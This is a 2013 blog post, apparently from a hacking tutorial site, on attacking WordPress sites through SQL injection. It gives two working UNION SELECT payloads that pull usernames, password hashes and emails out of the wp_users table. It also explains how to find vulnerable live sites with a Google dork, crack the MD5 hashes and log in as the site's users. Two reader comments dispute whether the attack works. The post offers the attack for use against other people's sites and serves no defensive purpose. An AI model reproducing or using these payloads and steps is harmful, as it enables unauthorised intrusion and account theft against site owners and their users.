Subscribe For Free Updates!

We'll not spam mate! We promise.

Wednesday, 7 August 2013

wordpress SQL Injection Hacks

wordpress SQL Injection Hacks : Another Special Post :-) 

images (65×123) There are Million of  sites which hosted on wordpress. and i already posted Some Tutorials on wordpress Hacking You Can Check it here , so Its new Tutorial on wordpress hacking with SQL injections, lets see



How To use it ? 
For Example 1st injection is "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/* Now Modify it into a Google Dork, For making Dork use "Inurl:injection's php or dire here" for example for this injection dork will be "inurl:wp-content/plugins/st_newsletter/stnl_iframe.php" Now Go to Google.com and type your modified dork and see the serach result the search result will be like this for dorkhttp://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=        Reomve the words after iframe.php and put ur SQl injection here ... now the url will behttp://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--You will got the use name and md5 coded password ... Crash the password using md5 decoding Tools and login here http://site.com/wp-login.php 
Note : The Process is same for all Injections is same ... cooment below if any dobught ..

Socialize This Post
SOCIALIZE IT →
FOLLOW →
SHARE IT →

2 comments:

  1. It works only if the user has that plugin otherwise it wont work

    ReplyDelete
  2. NO!! it works it doesnt matter whether u have the plugin or not try it

    ReplyDelete